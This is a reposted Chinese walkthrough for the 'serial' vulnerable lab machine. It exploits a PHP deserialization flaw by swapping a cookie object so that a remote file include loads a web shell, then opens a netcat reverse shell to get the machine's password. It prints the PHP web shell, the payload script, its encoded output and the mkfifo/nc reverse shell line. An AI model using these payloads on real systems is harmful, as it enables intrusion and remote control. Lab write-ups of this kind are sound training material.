您的位置:首页 > 科技 > IT业 > serial 反序列化靶机

serial 反序列化靶机

2024/9/29 4:15:25 来源:https://blog.csdn.net/l_OMl_l/article/details/140858435  浏览:    关键词:serial 反序列化靶机

1.安装靶机

2.扫描靶机ip,端口,访问

3.扫描目录,发现有 backup 目录,访问发现是压缩包,下载,解压,查看

通过审计源代码了解到: 首次访问该网站后,会通过 user.class.php 中的创建一个user对象, 内容为wel变量创建welcome对象,同时进行序列化base64编码存入cookie,在此过程中调用了 handler() 函数; 同时, log.class.php 中的 Log 类中也有 handler() 函数,并且还存在 include 文件包含漏洞,所以我们可以尝试将 Welcome 替换为 Log 类

4.构造下方代码 1.php ,保存到自己的网站下运行,实现将 welcome 替换为 Log ,同时使用文件包含漏洞上传木马文件,最后将代码序列化并 base64 编码

<?php@system($_GET['OMO']);
?>
<?phpclass Log {private $type_log = "http://本机ip/cc.txt";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6Mjc6Imh0dHA6Ly8xOTIuMTY4LjMuMjU0L2NjLnR4dCI7fX0=  

5.在 kali 开启监听, 抓包,发送重放器,修改 cookie ,并在 GET 处添加参数以及 shell 反弹语句rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+kali ip+7777+>/tmp/f

6.发送后,获取靶机 shell ,查看文件获取虚拟机密码

7.登录虚拟机

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com